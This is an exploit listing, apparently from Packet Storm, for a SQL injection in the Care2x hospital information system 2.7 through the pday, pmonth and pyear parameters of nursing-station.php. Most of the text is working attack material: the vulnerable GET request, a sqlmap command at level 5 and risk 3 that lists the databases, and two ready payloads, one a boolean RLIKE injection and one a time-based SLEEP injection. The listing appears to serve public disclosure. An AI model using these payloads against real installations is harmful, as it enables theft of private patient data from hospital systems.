Care2x Integrated Hospital Info System 2.7 SQL Injection

🗓️ 29 Jul 2021 00:00:00Reported by securityforeveryone.comType

packetstorm🔗 packetstormsecurity.com👁 226 Views

Care2x 2.7 SQL Injection via pday, pmonth, pyear parameters in nursing-station.ph

`# Exploit Title: Care2x Integrated Hospital Info System 2.7 - 'Multiple' SQL Injection  
# Date: 29.07.2021  
# Exploit Author: securityforeveryone.com  
# Vendor Homepage: https://care2x.org  
# Software Link: https://sourceforge.net/projects/care2002/  
# Version: =< 2.7 Alpha  
# Tested on: Linux/Windows  
# Researchers : Security For Everyone Team - https://securityforeveryone.com  
  
DESCRIPTION  
  
In Care2x < 2.7 Alpha, remote attackers can gain access to the database by exploiting a SQL Injection vulnerability via the "pday", "pmonth", "pyear" parameters.  
  
The vulnerability is found in the "pday", "pmonth", "pyear" parameters in GET request sent to page "nursing-station.php".  
  
Example:  
  
/nursing-station.php?sid=sid&lang=en&fwd_nr=&edit=1&retpath=quick&station=123123&ward_nr=1&dept_nr=&pday=[SQL]&pmonth=[SQL]&pyear=[SQL]&checkintern=   
  
if an attacker exploits this vulnerability, attacker may access private data in the database system.  
  
EXPLOITATION  
  
# GET /nursing-station.php?sid=sid&lang=en&fwd_nr=&edit=1&retpath=quick&station=station&ward_nr=1&dept_nr=&pday=[SQL]&pmonth=[SQL]&pyear=[SQL]&checkintern= HTTP/1.1  
# Host: Target  
  
Sqlmap command: sqlmap.py -r request.txt --level 5 --risk 3 -p year --random-agent --dbs   
  
Payload1: pyear=2021') RLIKE (SELECT (CASE WHEN (9393=9393) THEN 2021 ELSE 0x28 END)) AND ('LkYl'='LkYl  
Payload2: pyear=2021') AND (SELECT 4682 FROM (SELECT(SLEEP(5)))wZGc) AND ('dULg'='dULg  
`

29 Jul 2021 00:00Current